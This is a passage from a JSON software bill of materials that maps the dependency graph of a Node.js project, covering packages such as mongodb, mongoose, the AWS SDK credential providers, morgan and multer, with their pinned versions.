@acemir/cssom@0.9.23"},{"ref":"118-@asamuzakjp/dom-selector@6.7.4","dependsOn":["119-@asamuzakjp/nwsapi@2.3.9","120-bidi-js@1.0.3","122-css-tree@3.1.0","125-is-potential-custom-element-name@1.0.1","126-lru-cache@11.2.2"]},{"ref":"119-@asamuzakjp/nwsapi@2.3.9"},{"ref":"120-bidi-js@1.0.3","dependsOn":["121-require-from-string@2.0.2"]},{"ref":"121-require-from-string@2.0.2"},{"ref":"122-css-tree@3.1.0","dependsOn":["123-mdn-data@2.12.2","124-source-map-js@1.2.1"]},{"ref":"123-mdn-data@2.12.2"},{"ref":"124-source-map-js@1.2.1"},{"ref":"125-is-potential-custom-element-name@1.0.1"},{"ref":"126-lru-cache@11.2.2"},{"ref":"127-cssstyle@5.3.3","dependsOn":["128-@asamuzakjp/css-color@4.1.0","134-@csstools/css-syntax-patches-for-csstree@1.0.16","122-css-tree@3.1.0"]},{"ref":"128-@asamuzakjp/css-color@4.1.0","dependsOn":["129-@csstools/css-calc@2.1.4","130-@csstools/css-color-parser@3.1.0","132-@csstools/css-parser-algorithms@3.0.5","133-@csstools/css-tokenizer@3.0.4","126-lru-cache@11.2.2"]},{"ref":"129-@csstools/css-calc@2.1.4"},{"ref":"130-@csstools/css-color-parser@3.1.0","dependsOn":["131-@csstools/color-helpers@5.1.0","129-@csstools/css-calc@2.1.4"]},{"ref":"131-@csstools/color-helpers@5.1.0"},{"ref":"132-@csstools/css-parser-algorithms@3.0.5"},{"ref":"133-@csstools/css-tokenizer@3.0.4"},{"ref":"134-@csstools/css-syntax-patches-for-csstree@1.0.16"},{"ref":"135-data-urls@6.0.0","dependsOn":["136-whatwg-mimetype@4.0.0","137-whatwg-url@15.1.0"]},{"ref":"136-whatwg-mimetype@4.0.0"},{"ref":"137-whatwg-url@15.1.0","dependsOn":["138-tr46@6.0.0","140-webidl-conversions@8.0.0"]},{"ref":"138-tr46@6.0.0","dependsOn":["139-punycode@2.3.1"]},{"ref":"139-punycode@2.3.1"},{"ref":"140-webidl-conversions@8.0.0"},{"ref":"141-decimal.js@10.6.0"},{"ref":"142-html-encoding-sniffer@4.0.0","dependsOn":["143-whatwg-encoding@3.1.1"]},{"ref":"143-whatwg-encoding@3.1.1","dependsOn":["144-iconv-lite@0.6.3"]},{"ref":"144-iconv-lite@0.6.3","dependsOn":["145-safer-buffer@2.1.2"]},{"ref":"145-safer-buffer@2.1.2"},{"ref":"146-http-proxy-agent@7.0.2","dependsOn":["147-agent-base@7.1.4","148-debug@4.4.3"]},{"ref":"147-agent-base@7.1.4"},{"ref":"148-debug@4.4.3","dependsOn":["149-ms@2.1.3"]},{"ref":"149-ms@2.1.3"},{"ref":"150-https-proxy-agent@7.0.6","dependsOn":["147-agent-base@7.1.4","148-debug@4.4.3"]},{"ref":"151-parse5@8.0.0","dependsOn":["152-entities@6.0.1"]},{"ref":"152-entities@6.0.1"},{"ref":"153-saxes@6.0.0","dependsOn":["154-xmlchars@2.2.0"]},{"ref":"154-xmlchars@2.2.0"},{"ref":"155-symbol-tree@3.2.4"},{"ref":"156-tough-cookie@6.0.0","dependsOn":["157-tldts@7.0.18"]},{"ref":"157-tldts@7.0.18","dependsOn":["158-tldts-core@7.0.18"]},{"ref":"158-tldts-core@7.0.18"},{"ref":"159-w3c-xmlserializer@5.0.0","dependsOn":["160-xml-name-validator@5.0.0"]},{"ref":"160-xml-name-validator@5.0.0"},{"ref":"161-ws@8.18.3"},{"ref":"162-lodash@4.17.4"},{"ref":"163-marked@0.3.5"},{"ref":"164-method-override@3.0.0","dependsOn":["165-debug@3.1.0","54-methods@1.1.2","55-parseurl@1.3.3","166-vary@1.1.2"]},{"ref":"165-debug@3.1.0","dependsOn":["92-ms@2.0.0"]},{"ref":"166-vary@1.1.2"},{"ref":"167-moment@2.15.1"},{"ref":"168-mongodb@3.5.9","dependsOn":["169-bl@2.2.0","178-bson@1.1.4","179-denque@1.4.1","180-require_optional@1.0.1","174-safe-buffer@5.1.2","183-saslprep@1.0.3"]},{"ref":"169-bl@2.2.0","dependsOn":["170-readable-stream@2.3.7","177-safe-buffer@5.2.0"]},{"ref":"170-readable-stream@2.3.7","dependsOn":["171-core-util-is@1.0.2","82-inherits@2.0.3","172-isarray@1.0.0","173-process-nextick-args@2.0.0","174-safe-buffer@5.1.2","175-string_decoder@1.1.1","176-util-deprecate@1.0.2"]},{"ref":"171-core-util-is@1.0.2"},{"ref":"172-isarray@1.0.0"},{"ref":"173-process-nextick-args@2.0.0"},{"ref":"174-safe-buffer@5.1.2"},{"ref":"175-string_decoder@1.1.1","dependsOn":["174-safe-buffer@5.1.2"]},{"ref":"176-util-deprecate@1.0.2"},{"ref":"177-safe-buffer@5.2.0"},{"ref":"178-bson@1.1.4"},{"ref":"179-denque@1.4.1"},{"ref":"180-require_optional@1.0.1","dependsOn":["181-resolve-from@2.0.0","182-semver@5.7.0"]},{"ref":"181-resolve-from@2.0.0"},{"ref":"182-semver@5.7.0"},{"ref":"183-saslprep@1.0.3","dependsOn":["184-sparse-bitfield@3.0.3"]},{"ref":"184-sparse-bitfield@3.0.3","dependsOn":["185-memory-pager@1.5.0"]},{"ref":"185-memory-pager@1.5.0"},{"ref":"186-mongoose@6.13.6","dependsOn":["187-bson@4.7.2","191-kareem@2.5.1","192-mongodb@4.17.2","282-mpath@0.9.0","283-mquery@4.0.3","149-ms@2.1.3","284-sift@16.0.1"]},{"ref":"187-bson@4.7.2","dependsOn":["188-buffer@5.7.1"]},{"ref":"188-buffer@5.7.1","dependsOn":["189-base64-js@1.5.1","190-ieee754@1.1.13"]},{"ref":"189-base64-js@1.5.1"},{"ref":"190-ieee754@1.1.13"},{"ref":"191-kareem@2.5.1"},{"ref":"192-mongodb@4.17.2","dependsOn":["187-bson@4.7.2","193-mongodb-connection-string-url@2.6.0","200-socks@2.8.7","203-@aws-sdk/credential-providers@3.972.0","281-@mongodb-js/saslprep@1.4.5"]},{"ref":"193-mongodb-connection-string-url@2.6.0","dependsOn":["194-@types/whatwg-url@8.2.2","197-whatwg-url@11.0.0"]},{"ref":"194-@types/whatwg-url@8.2.2","dependsOn":["195-@types/node@13.1.7","196-@types/webidl-conversions@7.0.3"]},{"ref":"195-@types/node@13.1.7"},{"ref":"196-@types/webidl-conversions@7.0.3"},{"ref":"197-whatwg-url@11.0.0","dependsOn":["198-tr46@3.0.0","199-webidl-conversions@7.0.0"]},{"ref":"198-tr46@3.0.0","dependsOn":["139-punycode@2.3.1"]},{"ref":"199-webidl-conversions@7.0.0"},{"ref":"200-socks@2.8.7","dependsOn":["201-ip-address@10.1.0","202-smart-buffer@4.2.0"]},{"ref":"201-ip-address@10.1.0"},{"ref":"202-smart-buffer@4.2.0"},{"ref":"203-@aws-sdk/credential-providers@3.972.0","dependsOn":["204-@aws-sdk/client-cognito-identity@3.972.0","216-@aws-sdk/core@3.972.0","280-@aws-sdk/credential-provider-cognito-identity@3.972.0","247-@aws-sdk/credential-provider-env@3.972.0","248-@aws-sdk/credential-provider-http@3.972.0","249-@aws-sdk/credential-provider-ini@3.972.0","250-@aws-sdk/credential-provider-login@3.972.0","246-@aws-sdk/credential-provider-node@3.972.0","275-@aws-sdk/credential-provider-process@3.972.0","276-@aws-sdk/credential-provider-sso@3.972.0","279-@aws-sdk/credential-provider-web-identity@3.972.0","251-@aws-sdk/nested-clients@3.972.0","208-@aws-sdk/types@3.972.0","260-@smithy/config-resolver@4.4.6","220-@smithy/core@3.21.0","274-@smithy/credential-provider-imds@4.2.8","237-@smithy/node-config-provider@4.3.8","238-@smithy/property-provider@4.2.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"204-@aws-sdk/client-cognito-identity@3.972.0","dependsOn":["205-@aws-crypto/sha256-browser@5.2.0","206-@aws-crypto/sha256-js@5.2.0","216-@aws-sdk/core@3.972.0","246-@aws-sdk/credential-provider-node@3.972.0","252-@aws-sdk/middleware-host-header@3.972.0","253-@aws-sdk/middleware-logger@3.972.0","254-@aws-sdk/middleware-recursion-detection@3.972.0","256-@aws-sdk/middleware-user-agent@3.972.0","259-@aws-sdk/region-config-resolver@3.972.0","208-@aws-sdk/types@3.972.0","257-@aws-sdk/util-endpoints@3.972.0","262-@aws-sdk/util-user-agent-browser@3.972.0","264-@aws-sdk/util-user-agent-node@3.972.0","260-@smithy/config-resolver@4.4.6","220-@smithy/core@3.21.0","230-@smithy/fetch-http-handler@5.3.9","265-@smithy/hash-node@4.2.8","266-@smithy/invalid-dependency@4.2.8","267-@smithy/middleware-content-length@4.2.8","242-@smithy/middleware-endpoint@4.4.10","268-@smithy/middleware-retry@4.4.26","221-@smithy/middleware-serde@4.2.9","245-@smithy/middleware-stack@4.2.8","237-@smithy/node-config-provider@4.3.8","233-@smithy/node-http-handler@4.4.8","222-@smithy/protocol-http@5.3.8","241-@smithy/smithy-client@4.10.11","209-@smithy/types@4.12.0","243-@smithy/url-parser@4.2.8","223-@smithy/util-base64@4.3.0","227-@smithy/util-body-length-browser@4.2.0","271-@smithy/util-body-length-node@4.2.1","272-@smithy/util-defaults-mode-browser@4.3.25","273-@smithy/util-defaults-mode-node@4.2.28","258-@smithy/util-endpoints@3.2.8","228-@smithy/util-middleware@4.2.8","270-@smithy/util-retry@4.2.8","226-@smithy/util-utf8@4.2.0","210-tslib@2.8.1"]},{"ref":"205-@aws-crypto/sha256-browser@5.2.0","dependsOn":["206-@aws-crypto/sha256-js@5.2.0","214-@aws-crypto/supports-web-crypto@5.2.0","207-@aws-crypto/util@5.2.0","208-@aws-sdk/types@3.972.0","215-@aws-sdk/util-locate-window@3.965.3","211-@smithy/util-utf8@2.3.0","210-tslib@2.8.1"]},{"ref":"206-@aws-crypto/sha256-js@5.2.0","dependsOn":["207-@aws-crypto/util@5.2.0","208-@aws-sdk/types@3.972.0","210-tslib@2.8.1"]},{"ref":"207-@aws-crypto/util@5.2.0","dependsOn":["208-@aws-sdk/types@3.972.0","211-@smithy/util-utf8@2.3.0","210-tslib@2.8.1"]},{"ref":"208-@aws-sdk/types@3.972.0","dependsOn":["209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"209-@smithy/types@4.12.0","dependsOn":["210-tslib@2.8.1"]},{"ref":"210-tslib@2.8.1"},{"ref":"211-@smithy/util-utf8@2.3.0","dependsOn":["212-@smithy/util-buffer-from@2.2.0","210-tslib@2.8.1"]},{"ref":"212-@smithy/util-buffer-from@2.2.0","dependsOn":["213-@smithy/is-array-buffer@2.2.0","210-tslib@2.8.1"]},{"ref":"213-@smithy/is-array-buffer@2.2.0","dependsOn":["210-tslib@2.8.1"]},{"ref":"214-@aws-crypto/supports-web-crypto@5.2.0","dependsOn":["210-tslib@2.8.1"]},{"ref":"215-@aws-sdk/util-locate-window@3.965.3","dependsOn":["210-tslib@2.8.1"]},{"ref":"216-@aws-sdk/core@3.972.0","dependsOn":["208-@aws-sdk/types@3.972.0","217-@aws-sdk/xml-builder@3.972.0","220-@smithy/core@3.21.0","237-@smithy/node-config-provider@4.3.8","238-@smithy/property-provider@4.2.8","222-@smithy/protocol-http@5.3.8","240-@smithy/signature-v4@5.3.8","241-@smithy/smithy-client@4.10.11","209-@smithy/types@4.12.0","223-@smithy/util-base64@4.3.0","228-@smithy/util-middleware@4.2.8","226-@smithy/util-utf8@4.2.0","210-tslib@2.8.1"]},{"ref":"217-@aws-sdk/xml-builder@3.972.0","dependsOn":["209-@smithy/types@4.12.0","218-fast-xml-parser@5.2.5","210-tslib@2.8.1"]},{"ref":"218-fast-xml-parser@5.2.5","dependsOn":["219-strnum@2.1.2"]},{"ref":"219-strnum@2.1.2"},{"ref":"220-@smithy/core@3.21.0","dependsOn":["221-@smithy/middleware-serde@4.2.9","222-@smithy/protocol-http@5.3.8","209-@smithy/types@4.12.0","223-@smithy/util-base64@4.3.0","227-@smithy/util-body-length-browser@4.2.0","228-@smithy/util-middleware@4.2.8","229-@smithy/util-stream@4.5.10","226-@smithy/util-utf8@4.2.0","236-@smithy/uuid@1.1.0","210-tslib@2.8.1"]},{"ref":"221-@smithy/middleware-serde@4.2.9","dependsOn":["222-@smithy/protocol-http@5.3.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"222-@smithy/protocol-http@5.3.8","dependsOn":["209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"223-@smithy/util-base64@4.3.0","dependsOn":["224-@smithy/util-buffer-from@4.2.0","226-@smithy/util-utf8@4.2.0","210-tslib@2.8.1"]},{"ref":"224-@smithy/util-buffer-from@4.2.0","dependsOn":["225-@smithy/is-array-buffer@4.2.0","210-tslib@2.8.1"]},{"ref":"225-@smithy/is-array-buffer@4.2.0","dependsOn":["210-tslib@2.8.1"]},{"ref":"226-@smithy/util-utf8@4.2.0","dependsOn":["224-@smithy/util-buffer-from@4.2.0","210-tslib@2.8.1"]},{"ref":"227-@smithy/util-body-length-browser@4.2.0","dependsOn":["210-tslib@2.8.1"]},{"ref":"228-@smithy/util-middleware@4.2.8","dependsOn":["209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"229-@smithy/util-stream@4.5.10","dependsOn":["230-@smithy/fetch-http-handler@5.3.9","233-@smithy/node-http-handler@4.4.8","209-@smithy/types@4.12.0","223-@smithy/util-base64@4.3.0","224-@smithy/util-buffer-from@4.2.0","235-@smithy/util-hex-encoding@4.2.0","226-@smithy/util-utf8@4.2.0","210-tslib@2.8.1"]},{"ref":"230-@smithy/fetch-http-handler@5.3.9","dependsOn":["222-@smithy/protocol-http@5.3.8","231-@smithy/querystring-builder@4.2.8","209-@smithy/types@4.12.0","223-@smithy/util-base64@4.3.0","210-tslib@2.8.1"]},{"ref":"231-@smithy/querystring-builder@4.2.8","dependsOn":["209-@smithy/types@4.12.0","232-@smithy/util-uri-escape@4.2.0","210-tslib@2.8.1"]},{"ref":"232-@smithy/util-uri-escape@4.2.0","dependsOn":["210-tslib@2.8.1"]},{"ref":"233-@smithy/node-http-handler@4.4.8","dependsOn":["234-@smithy/abort-controller@4.2.8","222-@smithy/protocol-http@5.3.8","231-@smithy/querystring-builder@4.2.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"234-@smithy/abort-controller@4.2.8","dependsOn":["209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"235-@smithy/util-hex-encoding@4.2.0","dependsOn":["210-tslib@2.8.1"]},{"ref":"236-@smithy/uuid@1.1.0","dependsOn":["210-tslib@2.8.1"]},{"ref":"237-@smithy/node-config-provider@4.3.8","dependsOn":["238-@smithy/property-provider@4.2.8","239-@smithy/shared-ini-file-loader@4.4.3","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"238-@smithy/property-provider@4.2.8","dependsOn":["209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"239-@smithy/shared-ini-file-loader@4.4.3","dependsOn":["209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"240-@smithy/signature-v4@5.3.8","dependsOn":["225-@smithy/is-array-buffer@4.2.0","222-@smithy/protocol-http@5.3.8","209-@smithy/types@4.12.0","235-@smithy/util-hex-encoding@4.2.0","228-@smithy/util-middleware@4.2.8","232-@smithy/util-uri-escape@4.2.0","226-@smithy/util-utf8@4.2.0","210-tslib@2.8.1"]},{"ref":"241-@smithy/smithy-client@4.10.11","dependsOn":["220-@smithy/core@3.21.0","242-@smithy/middleware-endpoint@4.4.10","245-@smithy/middleware-stack@4.2.8","222-@smithy/protocol-http@5.3.8","209-@smithy/types@4.12.0","229-@smithy/util-stream@4.5.10","210-tslib@2.8.1"]},{"ref":"242-@smithy/middleware-endpoint@4.4.10","dependsOn":["220-@smithy/core@3.21.0","221-@smithy/middleware-serde@4.2.9","237-@smithy/node-config-provider@4.3.8","239-@smithy/shared-ini-file-loader@4.4.3","209-@smithy/types@4.12.0","243-@smithy/url-parser@4.2.8","228-@smithy/util-middleware@4.2.8","210-tslib@2.8.1"]},{"ref":"243-@smithy/url-parser@4.2.8","dependsOn":["244-@smithy/querystring-parser@4.2.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"244-@smithy/querystring-parser@4.2.8","dependsOn":["209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"245-@smithy/middleware-stack@4.2.8","dependsOn":["209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"246-@aws-sdk/credential-provider-node@3.972.0","dependsOn":["247-@aws-sdk/credential-provider-env@3.972.0","248-@aws-sdk/credential-provider-http@3.972.0","249-@aws-sdk/credential-provider-ini@3.972.0","275-@aws-sdk/credential-provider-process@3.972.0","276-@aws-sdk/credential-provider-sso@3.972.0","279-@aws-sdk/credential-provider-web-identity@3.972.0","208-@aws-sdk/types@3.972.0","274-@smithy/credential-provider-imds@4.2.8","238-@smithy/property-provider@4.2.8","239-@smithy/shared-ini-file-loader@4.4.3","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"247-@aws-sdk/credential-provider-env@3.972.0","dependsOn":["216-@aws-sdk/core@3.972.0","208-@aws-sdk/types@3.972.0","238-@smithy/property-provider@4.2.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"248-@aws-sdk/credential-provider-http@3.972.0","dependsOn":["216-@aws-sdk/core@3.972.0","208-@aws-sdk/types@3.972.0","230-@smithy/fetch-http-handler@5.3.9","233-@smithy/node-http-handler@4.4.8","238-@smithy/property-provider@4.2.8","222-@smithy/protocol-http@5.3.8","241-@smithy/smithy-client@4.10.11","209-@smithy/types@4.12.0","229-@smithy/util-stream@4.5.10","210-tslib@2.8.1"]},{"ref":"249-@aws-sdk/credential-provider-ini@3.972.0","dependsOn":["216-@aws-sdk/core@3.972.0","247-@aws-sdk/credential-provider-env@3.972.0","248-@aws-sdk/credential-provider-http@3.972.0","250-@aws-sdk/credential-provider-login@3.972.0","275-@aws-sdk/credential-provider-process@3.972.0","276-@aws-sdk/credential-provider-sso@3.972.0","279-@aws-sdk/credential-provider-web-identity@3.972.0","251-@aws-sdk/nested-clients@3.972.0","208-@aws-sdk/types@3.972.0","274-@smithy/credential-provider-imds@4.2.8","238-@smithy/property-provider@4.2.8","239-@smithy/shared-ini-file-loader@4.4.3","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"250-@aws-sdk/credential-provider-login@3.972.0","dependsOn":["216-@aws-sdk/core@3.972.0","251-@aws-sdk/nested-clients@3.972.0","208-@aws-sdk/types@3.972.0","238-@smithy/property-provider@4.2.8","222-@smithy/protocol-http@5.3.8","239-@smithy/shared-ini-file-loader@4.4.3","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"251-@aws-sdk/nested-clients@3.972.0","dependsOn":["205-@aws-crypto/sha256-browser@5.2.0","206-@aws-crypto/sha256-js@5.2.0","216-@aws-sdk/core@3.972.0","252-@aws-sdk/middleware-host-header@3.972.0","253-@aws-sdk/middleware-logger@3.972.0","254-@aws-sdk/middleware-recursion-detection@3.972.0","256-@aws-sdk/middleware-user-agent@3.972.0","259-@aws-sdk/region-config-resolver@3.972.0","208-@aws-sdk/types@3.972.0","257-@aws-sdk/util-endpoints@3.972.0","262-@aws-sdk/util-user-agent-browser@3.972.0","264-@aws-sdk/util-user-agent-node@3.972.0","260-@smithy/config-resolver@4.4.6","220-@smithy/core@3.21.0","230-@smithy/fetch-http-handler@5.3.9","265-@smithy/hash-node@4.2.8","266-@smithy/invalid-dependency@4.2.8","267-@smithy/middleware-content-length@4.2.8","242-@smithy/middleware-endpoint@4.4.10","268-@smithy/middleware-retry@4.4.26","221-@smithy/middleware-serde@4.2.9","245-@smithy/middleware-stack@4.2.8","237-@smithy/node-config-provider@4.3.8","233-@smithy/node-http-handler@4.4.8","222-@smithy/protocol-http@5.3.8","241-@smithy/smithy-client@4.10.11","209-@smithy/types@4.12.0","243-@smithy/url-parser@4.2.8","223-@smithy/util-base64@4.3.0","227-@smithy/util-body-length-browser@4.2.0","271-@smithy/util-body-length-node@4.2.1","272-@smithy/util-defaults-mode-browser@4.3.25","273-@smithy/util-defaults-mode-node@4.2.28","258-@smithy/util-endpoints@3.2.8","228-@smithy/util-middleware@4.2.8","270-@smithy/util-retry@4.2.8","226-@smithy/util-utf8@4.2.0","210-tslib@2.8.1"]},{"ref":"252-@aws-sdk/middleware-host-header@3.972.0","dependsOn":["208-@aws-sdk/types@3.972.0","222-@smithy/protocol-http@5.3.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"253-@aws-sdk/middleware-logger@3.972.0","dependsOn":["208-@aws-sdk/types@3.972.0","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"254-@aws-sdk/middleware-recursion-detection@3.972.0","dependsOn":["208-@aws-sdk/types@3.972.0","255-@aws/lambda-invoke-store@0.2.3","222-@smithy/protocol-http@5.3.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"255-@aws/lambda-invoke-store@0.2.3"},{"ref":"256-@aws-sdk/middleware-user-agent@3.972.0","dependsOn":["216-@aws-sdk/core@3.972.0","208-@aws-sdk/types@3.972.0","257-@aws-sdk/util-endpoints@3.972.0","220-@smithy/core@3.21.0","222-@smithy/protocol-http@5.3.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"257-@aws-sdk/util-endpoints@3.972.0","dependsOn":["208-@aws-sdk/types@3.972.0","209-@smithy/types@4.12.0","243-@smithy/url-parser@4.2.8","258-@smithy/util-endpoints@3.2.8","210-tslib@2.8.1"]},{"ref":"258-@smithy/util-endpoints@3.2.8","dependsOn":["237-@smithy/node-config-provider@4.3.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"259-@aws-sdk/region-config-resolver@3.972.0","dependsOn":["208-@aws-sdk/types@3.972.0","260-@smithy/config-resolver@4.4.6","237-@smithy/node-config-provider@4.3.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"260-@smithy/config-resolver@4.4.6","dependsOn":["237-@smithy/node-config-provider@4.3.8","209-@smithy/types@4.12.0","261-@smithy/util-config-provider@4.2.0","258-@smithy/util-endpoints@3.2.8","228-@smithy/util-middleware@4.2.8","210-tslib@2.8.1"]},{"ref":"261-@smithy/util-config-provider@4.2.0","dependsOn":["210-tslib@2.8.1"]},{"ref":"262-@aws-sdk/util-user-agent-browser@3.972.0","dependsOn":["208-@aws-sdk/types@3.972.0","209-@smithy/types@4.12.0","263-bowser@2.13.1","210-tslib@2.8.1"]},{"ref":"263-bowser@2.13.1"},{"ref":"264-@aws-sdk/util-user-agent-node@3.972.0","dependsOn":["256-@aws-sdk/middleware-user-agent@3.972.0","208-@aws-sdk/types@3.972.0","237-@smithy/node-config-provider@4.3.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"265-@smithy/hash-node@4.2.8","dependsOn":["209-@smithy/types@4.12.0","224-@smithy/util-buffer-from@4.2.0","226-@smithy/util-utf8@4.2.0","210-tslib@2.8.1"]},{"ref":"266-@smithy/invalid-dependency@4.2.8","dependsOn":["209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"267-@smithy/middleware-content-length@4.2.8","dependsOn":["222-@smithy/protocol-http@5.3.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"268-@smithy/middleware-retry@4.4.26","dependsOn":["237-@smithy/node-config-provider@4.3.8","222-@smithy/protocol-http@5.3.8","269-@smithy/service-error-classification@4.2.8","241-@smithy/smithy-client@4.10.11","209-@smithy/types@4.12.0","228-@smithy/util-middleware@4.2.8","270-@smithy/util-retry@4.2.8","236-@smithy/uuid@1.1.0","210-tslib@2.8.1"]},{"ref":"269-@smithy/service-error-classification@4.2.8","dependsOn":["209-@smithy/types@4.12.0"]},{"ref":"270-@smithy/util-retry@4.2.8","dependsOn":["269-@smithy/service-error-classification@4.2.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"271-@smithy/util-body-length-node@4.2.1","dependsOn":["210-tslib@2.8.1"]},{"ref":"272-@smithy/util-defaults-mode-browser@4.3.25","dependsOn":["238-@smithy/property-provider@4.2.8","241-@smithy/smithy-client@4.10.11","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"273-@smithy/util-defaults-mode-node@4.2.28","dependsOn":["260-@smithy/config-resolver@4.4.6","274-@smithy/credential-provider-imds@4.2.8","237-@smithy/node-config-provider@4.3.8","238-@smithy/property-provider@4.2.8","241-@smithy/smithy-client@4.10.11","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"274-@smithy/credential-provider-imds@4.2.8","dependsOn":["237-@smithy/node-config-provider@4.3.8","238-@smithy/property-provider@4.2.8","209-@smithy/types@4.12.0","243-@smithy/url-parser@4.2.8","210-tslib@2.8.1"]},{"ref":"275-@aws-sdk/credential-provider-process@3.972.0","dependsOn":["216-@aws-sdk/core@3.972.0","208-@aws-sdk/types@3.972.0","238-@smithy/property-provider@4.2.8","239-@smithy/shared-ini-file-loader@4.4.3","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"276-@aws-sdk/credential-provider-sso@3.972.0","dependsOn":["277-@aws-sdk/client-sso@3.972.0","216-@aws-sdk/core@3.972.0","278-@aws-sdk/token-providers@3.972.0","208-@aws-sdk/types@3.972.0","238-@smithy/property-provider@4.2.8","239-@smithy/shared-ini-file-loader@4.4.3","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"277-@aws-sdk/client-sso@3.972.0","dependsOn":["205-@aws-crypto/sha256-browser@5.2.0","206-@aws-crypto/sha256-js@5.2.0","216-@aws-sdk/core@3.972.0","252-@aws-sdk/middleware-host-header@3.972.0","253-@aws-sdk/middleware-logger@3.972.0","254-@aws-sdk/middleware-recursion-detection@3.972.0","256-@aws-sdk/middleware-user-agent@3.972.0","259-@aws-sdk/region-config-resolver@3.972.0","208-@aws-sdk/types@3.972.0","257-@aws-sdk/util-endpoints@3.972.0","262-@aws-sdk/util-user-agent-browser@3.972.0","264-@aws-sdk/util-user-agent-node@3.972.0","260-@smithy/config-resolver@4.4.6","220-@smithy/core@3.21.0","230-@smithy/fetch-http-handler@5.3.9","265-@smithy/hash-node@4.2.8","266-@smithy/invalid-dependency@4.2.8","267-@smithy/middleware-content-length@4.2.8","242-@smithy/middleware-endpoint@4.4.10","268-@smithy/middleware-retry@4.4.26","221-@smithy/middleware-serde@4.2.9","245-@smithy/middleware-stack@4.2.8","237-@smithy/node-config-provider@4.3.8","233-@smithy/node-http-handler@4.4.8","222-@smithy/protocol-http@5.3.8","241-@smithy/smithy-client@4.10.11","209-@smithy/types@4.12.0","243-@smithy/url-parser@4.2.8","223-@smithy/util-base64@4.3.0","227-@smithy/util-body-length-browser@4.2.0","271-@smithy/util-body-length-node@4.2.1","272-@smithy/util-defaults-mode-browser@4.3.25","273-@smithy/util-defaults-mode-node@4.2.28","258-@smithy/util-endpoints@3.2.8","228-@smithy/util-middleware@4.2.8","270-@smithy/util-retry@4.2.8","226-@smithy/util-utf8@4.2.0","210-tslib@2.8.1"]},{"ref":"278-@aws-sdk/token-providers@3.972.0","dependsOn":["216-@aws-sdk/core@3.972.0","251-@aws-sdk/nested-clients@3.972.0","208-@aws-sdk/types@3.972.0","238-@smithy/property-provider@4.2.8","239-@smithy/shared-ini-file-loader@4.4.3","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"279-@aws-sdk/credential-provider-web-identity@3.972.0","dependsOn":["216-@aws-sdk/core@3.972.0","251-@aws-sdk/nested-clients@3.972.0","208-@aws-sdk/types@3.972.0","238-@smithy/property-provider@4.2.8","239-@smithy/shared-ini-file-loader@4.4.3","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"280-@aws-sdk/credential-provider-cognito-identity@3.972.0","dependsOn":["204-@aws-sdk/client-cognito-identity@3.972.0","208-@aws-sdk/types@3.972.0","238-@smithy/property-provider@4.2.8","209-@smithy/types@4.12.0","210-tslib@2.8.1"]},{"ref":"281-@mongodb-js/saslprep@1.4.5","dependsOn":["184-sparse-bitfield@3.0.3"]},{"ref":"282-mpath@0.9.0"},{"ref":"283-mquery@4.0.3","dependsOn":["148-debug@4.4.3"]},{"ref":"284-sift@16.0.1"},{"ref":"285-morgan@1.10.0","dependsOn":["286-basic-auth@2.0.1","91-debug@2.6.9","93-depd@2.0.0","287-on-finished@2.3.0","94-on-headers@1.0.2"]},{"ref":"286-basic-auth@2.0.1","dependsOn":["174-safe-buffer@5.1.2"]},{"ref":"287-on-finished@2.3.0","dependsOn":["288-ee-first@1.1.1"]},{"ref":"288-ee-first@1.1.1"},{"ref":"289-ms@0.7.3"},{"ref":"290-multer@2.0.2","dependsOn":["291-append-field@1.0.0","71-busboy@1.6.0","292-concat-stream@2.0.0","296-mkdirp@0.5.6","298-object-assign@4.1.1","299-type-is@1.6.18","302-xtend@4.0.2"]},{"ref":"291-append-field@1.0.0"},{"ref":"292-concat-stream@2.0.0","dependsOn":["293-buffer-from@1.1.1","82-inherits@2.0.3","294-readable-stream@3.6.2","295-typedarray@0.0.6"]},{"ref":"293-buffer-from@1.1.1"},{"ref":"294-readable-stream@3.6.2","dependsOn":["82-inherits@2.0.3","175-string_decoder@1.1.1","176-util-deprecate@1.0.2"]},{"ref":"295-typedarray@0.0.6"},{"ref":"296-mkdirp@0.5.6","dependsOn":["297-minimist@1.2.8"]},{"ref":"297-minimist@1.2.8"},{"ref":"298-object-assign@4.1.1"},{"ref":"299-type-is@1.6.18","dependsOn":["7-media-typer@0.3.0","300-mime-types@2.1.35"]},{"ref":"300-mime-types@2.1.35","dependsOn":["301-mime-db@1.52.0"]},{"ref":"301-mime-db@1.52.0"},{"ref":"302-xtend@4.